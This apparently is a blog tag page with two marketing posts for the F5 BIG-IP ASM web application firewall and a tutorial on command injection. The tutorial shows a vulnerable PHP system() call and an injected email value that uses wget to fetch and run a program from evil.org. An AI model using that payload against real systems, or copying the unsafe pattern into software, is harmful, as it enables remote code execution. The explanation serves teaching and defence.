Posts Tagged SQL injection

Built-in Compliance Capabilities

Advanced, built-in security protection and remote auditing help your organization comply with industry security standards, including Payment Card Industry Data Security Standard (PCI DSS), HIPAA, Basel II, and SOX, in a cost-effective way—without requiring multiple appliances, application changes, or rewrites. BIG-IP ASM reports previously unknown threats, such as layer 7 denial-of-service (DoS) and SQL injection attacks, and it mitigates web application threats to shield the organization from data breaches. All reports are GUI-driven and provide drill-down options with a click.

PCI

PCI reporting

With PCI reporting, BIG-IP ASM lists security measures required by PCI DSS 1.2, determines if compliance is being met, and details steps required to become compliant if not.

Geolocation reporting

Geolocation reporting informs you of the country where threats originate in addition to attack type, violation, URL, IP address, severity, and more. You can also schedule reports to be sent to a designated email address automatically for up-to-date reporting.

geoloc

Easy-to-read format for remote auditing

BIG-IP ASM makes security compliance easier and saves valuable IT time by exporting policies in human readable format. The flat, readable XML file format enables auditors to view the policies off site. Auditors working remotely can view, select, review, and test policies without requiring time and support from the web application security administrator.

Advertisements

, , , , , , ,

Leave a comment

Command Injection

A successful command injection attack gives the attacker complete control of the remote system.

When user input is used as part of a system command, an attack may be able to inject system commands into the user input. This can happen in any programming language; however, it is very common in Perl, PHP, and shell based CGI. It is less common in Java, Phython, and C#. Consider the following PHP code snippet:

<?php
$email_subject = “some subject”;
if ( isset($_GET{’email’})) {
system(“mail ” + $_GET{’email’}) + ” -s ‘” + $email_subject +
“‘ < /tmp/email_body”, $return_val);
}
?>

The user sends his or her e-mail address in the email parameter, and that user input is placed directly into a system command. Like SQL injection, the goal of the attacker is to inject a shell command into the email parameter while ensuring that the code before and after the email parameter is syntactically correct. Consider the system() call as a puzzle. The outer puzzle pieces are in place, and the attacker must find a puzzle piece in the middle to finish it off:

mail [MISSING PUZZLE PIECE] –s ‘some subject’ < /tmp/email_body

The puzzle piece needs to ensure that the mail command runs and exits properly. For example, mail –help will run and exit properly. Then the attacker could add additional shell commands by separating the commands with semicolons (;). Dealing with the puzzle piece on the other side is as simple as commenting it out with the shell comment symbol (#). Thus, a useful puzzle piece for the email parameter might be this:

–help; wget http://evil.org/attack_program; ./attack_program #

Adding this puzzle piece to the puzzle creates the following shell command:

mail –help; wget http://evil.org/attack_program;
./attack_program # s ‘some subject’ < /tmp/email_body

This is equivalent to this:

mail –help; wget http://evil.org/attack_program; ./attack_program

This runs mail –help and then downloads attack_program from evil.org and executes it, allowing the attacker to perform arbitrary commands on the vulnerable web site.

, , , , ,

1 Comment

Defend Against Web Attacks and Achieve Regulatory Compliance

With the continued growth of web application traffic, an increasing amount of sensitive
data is exposed to potential theft, security vulnerabilities, and multi-layer attacks. Protect
your organization and its reputation by maintaining the confidentiality, availability, and
performance of the applications that are critical to your business.

Key benefits

Ensure app security and availability

Get comprehensive geolocation attack protection from layer 7 distributed denial of
service (DDoS), SQL injection, and OWASP Top Ten attacks, and secure the latest
interactive AJAX applications and JSON payloads.

Reduce costs and enable compliance

Achieve security standards compliance with built-in application protection.

Get out-of-the-box app security policies

Provide protection with pre-built rapid deployment policies and minimal configuration.

Improve app security and performance

Enable advanced application security while accelerating performance and improving
cost effectiveness.

Deploy flexibly and increase agility

Focus on fast application development and flexible deployment in virtual and cloud
environments with automatic security policies.

, , , , , , , , , , , , ,

Leave a comment

%d bloggers like this: